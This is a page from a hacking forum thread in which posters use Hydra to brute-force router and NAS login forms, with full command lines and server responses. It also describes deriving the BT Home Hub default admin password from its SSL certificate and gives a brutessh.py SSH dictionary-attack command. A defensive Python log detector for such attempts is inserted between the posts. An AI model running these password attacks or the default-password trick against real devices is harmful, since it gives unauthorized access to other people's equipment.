Page 2 of 2 (results 11 to 15 of 15)

Thread: Using hydra to bruteforce a router with cgi-bin/[xy] authentication

  1. #11
     Member, joined Jun 2008, 101 posts

    First of all let me say this is a well explained tutorial! At home I have a Buffalo NAS that uses cgi-bin authentication. Below you can see the source code info...

    <form id="frmNas" name="frmNas" method="post" action="/cgi-bin/top.cgi">
    <input type="text" id="txtAuthLoginUser" name="txtAuthLoginUser" value="" size="24" maxlength="20" />
    <input type="password" id="txtAuthLoginPassword" name="txtAuthLoginPassword" value="" size="24" maxlength="20" />
    It has a built-in user "admin"... So far I have everything except the "incorrect condition"... Here is how I'm executing Hydra with Wireshark to see what the NAS sends back...

    hydra -l "" -P shortdict.txt -t 1 -f -v -V 192.168.1.3 http-post-form /cgi-bin/top.cgi:txtAuthLoginUser=admin&txtAuthLoginPassword=^PASS^

    I'm actually stuck on the last part, the "incorrect" condition. I ran Wireshark and these are the responses it gave... In the image there are 2 POSTs by Hydra followed by TCP responses from the NAS.

    http://img125.imageshack.us/img125/4821/authsnapshotpd0.jpg

    Feel free to ask for additional info.

  2. #12
     Just burned his ISO, joined Jan 2009, 1 post

     help me!

    I found a USR with tF form.

    I used

    C:\run\hydra>hydra -l user -P dict_all_dates.txt -t 1 -f -v -V -e ns 192.168.2.1 http-post-form /cgi-bin/login.exews=^PASS^:loginpserr.stm

    Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
    Hydra starting at 2009-01-26 23:01:59
    [DATA] 1 tasks, 1 servers, 470072 login tries (l:1/p:470072), ~470072 tries per task
    [DATA] attacking service http-post-form on port 80
    [VERBOSE] Resolving addresses ... done
    [ATTEMPT] target 192.168.2.1 - login "user" - pass "" - child 0 - 1 of 470072
    HTTP/1.0 302 Found
    Server: Apache/0.6.5
    Pragma: no-cache
    Date: Sun, 01 Jan 2001 00:00:00 GMT
    Expires: Sun, 01 Jan 2001 00:00:00 GMT
    Cache-Control: max-age=0, must-revalidate
    Connection: close
    Location: ............/loginpserr.stm
    Content-type: text/html

    <HEAD><TITLE>302 Document moved</TITLE></HEAD>
    <BODY><H1>302 Document moved</H1>
    This document has moved <A HREF="---------/192.168.2.1/loginpserr.stm">here</A>.<P>

    </BODY>
    [ATTEMPT] target 192.168.2.1 - login "user" - pass "user" - child 0 - 2 of 470072
    [ATTEMPT] target 192.168.2.1 - login "user" - pass "01 01 00" - child 0 - 3 of 470072
    HTTP/1.0 302 Found
    Server: Apache/0.6.5
    Pragma: no-cache
    Date: Sun, 01 Jan 2001 00:00:00 GMT
    Expires: Sun, 01 Jan 2001 00:00:00 GMT
    Cache-Control: max-age=0, must-revalidate
    Connection: close
    Location: ---------/loginpserr.stm
    Content-type: text/html

    <HEAD><TITLE>302 Document moved</TITLE></HEAD>
    <BODY><H1>302 Document moved</H1>
    This document has moved <A HREF="........192.168.2.1/loginpserr.stm">here</A>.<P>

    .....
    Hmmm, is it correct?

    I tried with pass="" or other passwords on my router, but hydra did not find it!!

    Bye,
    Mariodm
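The two posts above both show the same server-side signature of an http-post-form run: a burst of POSTs to the login CGI, each answered with a 302 to the error page (loginpserr.stm). The following detector is an added example, not code from the thread; it assumes a constructed "ip [timestamp] method path status redirect" log format and the login path /cgi-bin/login.exe, and flags a source that produces a burst of such failures, noting whether a non-error login followed it.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in an assumed "ip [timestamp] method path status redirect"
# format (not the router's real log format). A failed login to the cgi-bin form
# answers 302 to loginpserr.stm, as in the responses captured above.
SAMPLE_LOG = """\
192.168.2.77 [2009-01-26T23:01:59] POST /cgi-bin/login.exe 302 /loginpserr.stm
192.168.2.77 [2009-01-26T23:02:00] POST /cgi-bin/login.exe 302 /loginpserr.stm
192.168.2.77 [2009-01-26T23:02:01] POST /cgi-bin/login.exe 302 /loginpserr.stm
192.168.2.77 [2009-01-26T23:02:02] POST /cgi-bin/login.exe 302 /loginpserr.stm
192.168.2.77 [2009-01-26T23:02:03] POST /cgi-bin/login.exe 302 /loginpserr.stm
192.168.2.77 [2009-01-26T23:02:04] POST /cgi-bin/login.exe 302 /index.stm
192.168.2.10 [2009-01-26T23:05:00] POST /cgi-bin/login.exe 302 /loginpserr.stm
"""
LINE_RE = re.compile(r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] (?P<method>\S+) (?P<path>\S+) '
                     r'(?P<status>\d{3}) (?P<loc>\S+)$')
LOGIN_PATH = "/cgi-bin/login.exe"   # assumed login CGI path
FAIL_MARKER = "loginpserr.stm"      # the "incorrect condition" string the thread looks for

def parse(log_text):
    # Return (ip, timestamp, failed) for every POST to the login CGI.
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != LOGIN_PATH:
            continue
        failed = m["status"] == "302" and FAIL_MARKER in m["loc"]
        events.append((m["ip"], datetime.fromisoformat(m["ts"]), failed))
    return events

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag IPs with >= threshold failed logins inside `window`, and whether a
    non-error login followed the burst (possible credential compromise)."""
    by_ip = defaultdict(list)
    for ip, ts, failed in parse(log_text):
        by_ip[ip].append((ts, failed))
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [t for t, f in evs if f]
        start = 0  # sliding window over failure timestamps
        for end in range(len(fails)):
            while fails[end] - fails[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                success_after = any(not f and t >= fails[end] for t, f in evs)
                alerts[ip] = {"failures": end - start + 1, "success_after": success_after}
                break
    return alerts
```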

  3. #13
     drgr33n, Very good friend of the forum, joined Jan 2010, location: Dark side of the moon ..., 699 posts

    Just reading this and I know it's a bit old, but the serial number for those BT routers is in the SSL cert. Just log in, go to https://192.168.1.254 and examine the security cert. I think you have to add cp before the serial to log in.

  4. #14

    Quote (originally posted by Dr_GrEeN):
        Just reading this and I know it's a bit old, but the serial number for those BT routers is in the SSL cert. Just log in, go to https://192.168.1.254 and examine the security cert. I think you have to add cp before the serial to log in.

    Hi Dr_GrEeN!

    Thank you for your advice, I was just looking on the forums for such an answer and you gave me the answer I was looking for. Great trick with the SSL cert. I examined my SSL cert and ran into a problem.

    When you stated "I think you have to add cp before the serial to login", what did you mean by "cp"? Did you mean the letters "cp", or did you mean "CN" (Common Name)? Because I cannot find anything called "CP" within the SSL cert.

    I tried using:
    cpXXXXXXXX
    &
    cpXX:XX:XX:XX
    X=Digit of Serial

    But neither work, instead I am prompted with a popup error:
    Code:
    Error establishing an encrypted connection to 192.168.1.254. Error Code: -12217
    So I went to Google to do some research on this "cp" that I do not understand. I came to this page:
    http://www.gnucitizen.org/blog/dumpi...e-bt-home-hub/

    And found the following:

    REPLY-ANT-SEARCH MDAP/1.1
    ANT-ID:0633EHPSL
    ANT-NAME:SpeedTouch BTHH
    ANT-MAC:00-14-7F-AA-BB-CC
    ANT-HOSTSETUP:auto
    TO-HOST:192.168.1.70:2317
    TP-VERSION:2.0.0
    MDAP-VERSION:1.2
    43


    The only difference between the ANT-ID parameter and the serial number of the Home Hub is that the serial number is prefixed with ‘CP’. So in this example, the corresponding serial number - which is the default admin password - would be CP0633EHPSL (see the screenshot for more information)
    So, now I know (by looking at the full page on the link above) that the only difference between the serial and the ANT-ID is that the serial just has "cp" (without quotes) as a prefix... just like you said. Sorry Dr_GrEeN, I just wanted to understand this and thought I would type out my thoughts in case anyone else didn't know where "cp" came from.

    So back to the problem I had earlier, where I was entering the wrong details. I checked the SSL certificate and obviously when I viewed it, I saw the word "Serial" and automatically thought that is what it was, the serial. In fact it was not the serial at all, well, not the serial of what I was pentesting.

    So after doing some reading I figured out that it is actually the Organizational Unit that is used in conjunction with the CP.

    Here is the information I was looking at on the SSL Certificate:

    Code:
    Common Name (CN)         BT Home Hub
    Organization (O)         THOMSON
    Organizational Unit      06XXXXXXX
    Serial Number            7E:XX:XX:XX
    Thanks to you Dr_GrEeN for telling us about the SSL cert hint. Now I have successfully pwned my BT Home Hub.

    So for quick reference, the serial of a BTHomeHub is the prefix "CP" + "Organizational Unit":
    Example:

    CP06XXXXXXX

    Do not be misled by the SSL certificate stating the "serial", as it is not the serial you will be using; it's the Organizational Unit.

    This pentest was tested on the BT Home Hub using software version: 6.2.6.E

  5. #15
     Just burned his ISO, joined Apr 2009, location: Leicester, UK, 6 posts

     alternative in backtrack 4

    I don't know whether this post will help anyone, but here goes.

    In BackTrack 4, you can use brutessh.py.

    Just navigate to the dir. (/pentest/password/brutessh)

    and run this command:

    python brutessh.py -h [host name] -u [User name] -d [dictionary or password list]

    for example:

    python brutessh.py -h 192.168.1.100 -u Adam -d /pentest/password/jtr/password.lst
